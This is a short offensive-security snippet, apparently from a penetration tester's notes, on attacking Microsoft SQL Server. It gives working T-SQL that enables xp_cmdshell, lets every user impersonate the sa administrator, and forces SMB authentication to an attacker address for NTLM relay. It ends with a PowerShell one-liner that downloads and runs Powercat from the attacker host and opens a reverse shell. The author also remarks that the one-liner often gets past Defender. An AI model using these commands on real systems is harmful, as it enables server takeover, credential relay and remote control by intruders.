MS SQL includes the xp_cmdshell “extended”procedure, which allows a shell command to be called. This is disabled by default, but if enabled it can be used in a trigger to provide persistence on database activity. Powercat, a re-implementation of netcat in pure PowerShell, is useful here.
-- Enable MS SQL "advanced options"
--
sp_configure 'Show Advanced Options',1;
RECONFIGURE;
-- Enable xp_cmdshell stored procedure
--
sp_configure 'xp_cmdshell',1;
RECONFIGURE;
--- OPTIONAL: Allow all users to impersonate the "sa" (database
--- administrator) user (this enables low-privilege website users
--- to run xp_cmdshell)
---
USE master;
GRANT impersonate ON login::sa TO [public];
-- Coerce MS SQL to connecting using SMB to an attacker at
-- 1.2.3.4. Useful for NTLM relay attacks (if SMB signing isn't
-- turned on, that is).
--
EXEC master.sys.xp_dirtree '\\1.2.3.4\share',1,1;
-- Download an execute Powercat from an attacker at 1.2.3.4
-- (using the built-in Python web server) and connect back to
-- that IP on port 1337. Note that this in general should be
-- caught by IDS/IDP systems, including Defender... But I've
-- actually had it work for me out-of-the-box a surprising
-- number of times.
--
EXEC master.sys.xp_cmdshell 'powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString(''http://1.2.3.4:8000/powercat.ps1''); powercat -c 1.2.3.4 -p 1337 -e cmd.exe"'